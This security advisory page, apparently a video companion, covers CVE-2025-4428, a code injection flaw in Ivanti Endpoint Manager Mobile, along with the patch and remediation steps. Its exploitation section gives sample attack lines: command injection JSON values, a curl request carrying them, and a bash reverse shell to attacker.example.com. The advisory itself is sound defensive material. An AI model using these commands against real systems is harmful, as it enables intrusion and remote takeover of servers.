Ivanti EPMM: Remote Code Execution in Ivanti Endpoint Manager Mobile API (CVE-2025-4428) #shorts

Summary

Welcome to today’s security update. We’re discussing CVE-2025-4428, a critical remote code execution vulnerability in Ivanti Endpoint Manager Mobile. Disclosed in mid-May 2025 and confirmed exploited in the wild, this flaw allows attackers to run arbitrary code on vulnerable installations. Stay tuned as we break down the details and what you need to do to protect your environment.

Product details

Ivanti Endpoint Manager Mobile, also known as EPMM, is a unified endpoint management solution that secures and manages mobile devices across enterprises. The affected component is the EPMM API in version 12.5.0.0 and earlier on all supported platforms. Ivanti released version 12.5.0.1 which addresses this issue; earlier versions remain vulnerable.

Vulnerability type summary

CVE-2025-4428 stems from improper control of code generation, classified under CWE-94: Code Injection. The vulnerability exists in the API logic where crafted requests can manipulate the system’s execution flow, leading to unauthorized code injection and execution.

Details of the vulnerability

Authenticated users can send specially crafted API calls that inject malicious code into the EPMM server process. While this flaw alone requires valid credentials, security researchers at watchTowr Labs demonstrated an unauthenticated attack chain when combining CVE-2025-4427 (an authentication bypass issue) with CVE-2025-4428. This chain allows attackers to bypass login checks and then execute arbitrary payloads, fully compromising the management server. Ivanti confirmed active exploitation in targeted attacks, and CERT issued advisories urging immediate patching.

Conclusion

CVE-2025-4428 poses a severe risk to any organization running Ivanti EPMM 12.5.0.0 or earlier. Administrators should apply the 12.5.0.1 update without delay, review access logs for suspicious API activity, and ensure all mobile management endpoints are behind proper network controls. That’s all for this episode—stay vigilant and keep your systems patched.

Watch the full video on YouTube: CVE-2025-4428

Remediation and exploitation details

This chain involves the following actors

  • Authenticated Attacker: Exploits the vulnerability to run code on the server
  • IT Administrator: Maintains and secures the Ivanti Endpoint Manager Mobile server

This following systems are involved

  • Ivanti Endpoint Manager Mobile (Enterprise mobile device management): Hosts the vulnerable application programming interface component

Attack entry point

  • Mobile Application Programming Interface Endpoint: HTTP interface used for device management requests

Remediation actions

IT Administrator
Upgrade Ivanti Endpoint Manager Mobile to version 12.5.0.1 or later
Ivanti Endpoint Manager Mobile
IT Administrator
Apply the official security advisory patch
Ivanti Endpoint Manager Mobile
IT Administrator
Restrict access to the application programming interface to trusted networks and accounts
Mobile Application Programming Interface Endpoint

Exploitation actions

Login with stolen or guessed credentials

Authenticated Attacker
Obtain valid user credentials or access token
Mobile Application Programming Interface Endpoint
Examples:
  • Use phishing or credential stuffing to acquire a legitimate account

Manipulate request body data to include code injection

Authenticated Attacker
Craft malicious request payload with embedded commands
Mobile Application Programming Interface Endpoint
Examples:
  • Insert operating system commands into a JSON field, for example: {"deviceName":"test; uname -a"}

Remote code execution via crafted API call

Authenticated Attacker
Send the malicious payload to the vulnerable endpoint
Ivanti Endpoint Manager Mobile server
Examples:
  • curl -X POST https://server.example.com/api/devices -H "Content-Type: application/json" -d '{"deviceName":"test; id"}'

Operating system command injection followed by reverse connection

Authenticated Attacker
Execute arbitrary code and establish a backdoor
Ivanti Endpoint Manager Mobile server
Examples:
  • bash -i >& /dev/tcp/attacker.example.com/4444 0>&1

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-4428
Description
Remote Code Execution in API component in Ivanti Endpoint Manager Mobile 12.5.0.0 and prior on unspecified platforms allows authenticated attackers to execute arbitrary code via crafted API requests.
Provider
ivanti
CWE / problem types
CWE-94: Improper Control of Generation of Code ('Code Injection')
Affected Software Versions
Ivanti:Endpoint Manager Mobile:[{'status': 'unaffected', 'version': '12.5.0.1'}]
Date Published
2025-05-13T15:46:55.176Z
Last Updated
2025-05-16T03:55:33.194Z